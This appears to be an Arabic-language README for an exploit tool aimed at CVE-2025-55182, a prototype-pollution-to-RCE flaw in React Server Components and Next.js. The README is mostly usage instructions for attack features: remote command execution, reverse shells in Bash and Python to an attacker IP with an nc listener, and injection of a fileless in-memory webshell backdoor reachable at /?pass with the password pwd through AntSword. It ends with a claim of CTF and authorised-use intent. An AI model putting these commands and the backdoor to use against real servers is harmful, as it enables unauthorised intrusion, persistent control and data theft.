
المؤلف: lamaper / BITs2Sys
الإصدار: 1.0.1
الترخيص: MIT
هذه الأداة هي أداة اختبار اختراق آلية مصممة خصيصًا لثغرة CVE-2025-55182 (تلوث سلسلة النماذج الأولية في React Server Components / Next.js المؤدي إلى RCE). صُممت الأداة خصيصًا لمسابقات CTF ومشاريع الخدمات الأمنية المصرح بها، وتجمع بين عدة وظائف مثل التحقق من الثغرات، وفحص الاتصال بالشبكة الخارجية، وإنشاء قشرة عكسية، وحقن الحصان المقيم في الذاكرة.
--cmd): يستخدم آلية الاستثناء NEXT_REDIRECT لإرجاع نتائج تنفيذ الأوامر المشفرة بـ Base64 بدقة.--check-outbound): يختبر تلقائيًا قدرة الهدف على الوصول إلى DNS وHTTP وICMP، مما يساعد في تحديد مسار الهجوم.--shell): تتضمن وضعي القشرة العكسية Bash وPython3، وتدعم التنفيذ غير المتزامن لمنع تعليق طلبات HTTP.--inject-ms): يقوم بحقن حصان مقيم في الذاكرة عبر اختطاف آلية توزيع الأحداث في http.Server الخاص بـ Node.js، دون ترك أي ملفات على القرص، ويدعم التحكم المستمر.--ms-cmd): وضع تفاعل مستقل عن مسار استغلال الثغرة، يمكنك من تنفيذ الأوامر مباشرة عبر الباب الخلفي بعد نجاح الحقن.هذه الأداة مبنية على Python 3، وتتطلب فقط تثبيت مكتبة requests.
pip install requests
https://github.com/assetnote/react2shell-scanner هو أداة فحص مفيدة جدًا
احصل على معلومات الهدف مباشرة:
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"
قبل محاولة إنشاء قشرة عكسية، تأكد من قدرة الهدف على الاتصال بالإنترنت الخارجي:
python exploit.py --url http://target.com/ --check-outbound
وضع Bash:
# 攻击机执行监听: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444
وضع Python:
python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444
حقن الحصان المقيم في الذاكرة:
python exploit.py --url http://target.com/ --inject-ms
تنفيذ الأوامر عبر الحصان المقيم (يُستخدم بعد نجاح الحقن):
python exploit.py --url http://target.com/ --ms-cmd "whoami"
ملاحظة: المسار الافتراضي لتركيب الحصان المقيم هو /?pass، ويتم التشغيل بإرسال المعامل pwd عبر POST.
الاتصال عبر أداة AntSword:
كلمة مرور الاتصال: pwd، طريقة الاتصال: CMDLINUX
تُستخدم هذه الأداة فقط في النطاق المسموح به قانونًا لأغراض البحث الأمني ومسابقات CTF واختبارات الاختراق المصرح بها. يُحظر تمامًا استخدامها في الهجمات غير القانونية. يتحمل المستخدم كامل المسؤولية عن أي عواقب تنجم عن استخدام هذه الأداة.